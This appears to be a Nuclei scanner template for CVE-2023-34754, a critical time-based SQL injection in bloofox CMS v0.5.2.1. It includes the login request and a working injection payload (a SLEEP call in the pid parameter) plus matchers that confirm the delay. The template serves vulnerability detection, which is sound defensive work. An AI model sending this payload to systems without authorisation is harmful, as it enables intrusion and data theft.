id: CVE-2023-34754 info: name: Bloofox v0.5.2.1 - SQL Injection author: ritikchaddha severity: critical description: | bloofox v0.5.2.1 was discovered to contain a SQL injection vulnerability via the pid parameter at admin/index.php?mode=settings&page=plugins&action=edit. impact: | Allows attackers to execute arbitrary SQL queries, potentially leading to data leakage or data manipulation. remediation: | Update bloofox to version v0.5.2.2 or later to patch the SQL Injection vulnerability. reference: - https://ndmcyb.hashnode.dev/T-v0521-was-discovered-to-contain-many-sql-injection-vulnerability - https://nvd.nist.gov/vuln/detail/CVE-2023-34754 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-34754 cwe-id: CWE-89 epss-score: 0.00265 epss-percentile: 0.65516 cpe: cpe:2.3:a:bloofox:bloofoxcms:0.5.2.1:*:*:*:*:*:*:* metadata: max-request: 2 verified: true vendor: bloofox product: bloofoxcms tags: time-based-sqli,cve,cve2023,bloofox,sqli,authenticated http: - raw: - | POST /admin/index.php HTTP/2 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded username={{username}}&password={{password}}&action=login - | POST /admin/index.php?mode=settings&page=plugins&action=edit HTTP/2 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded status=1&pid=14'+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+Ptkr%26send%3dSave&send=Save matchers: - type: dsl dsl: - 'duration_2>=6' - 'contains_all(body_2, "Active", "Inactive")' - 'status_code_2 == 200' condition: and # digest: 490a0046304402204e53d6c595dc28b25c838426f2f14529673a84b25765cb53fcc6af4c7438747202203b3aa9f7537c8dc2082627251a80a6f38c6d8169c1fabf595f7d0f39a4d36d74:922c64590222798bb761d5b6d8e72950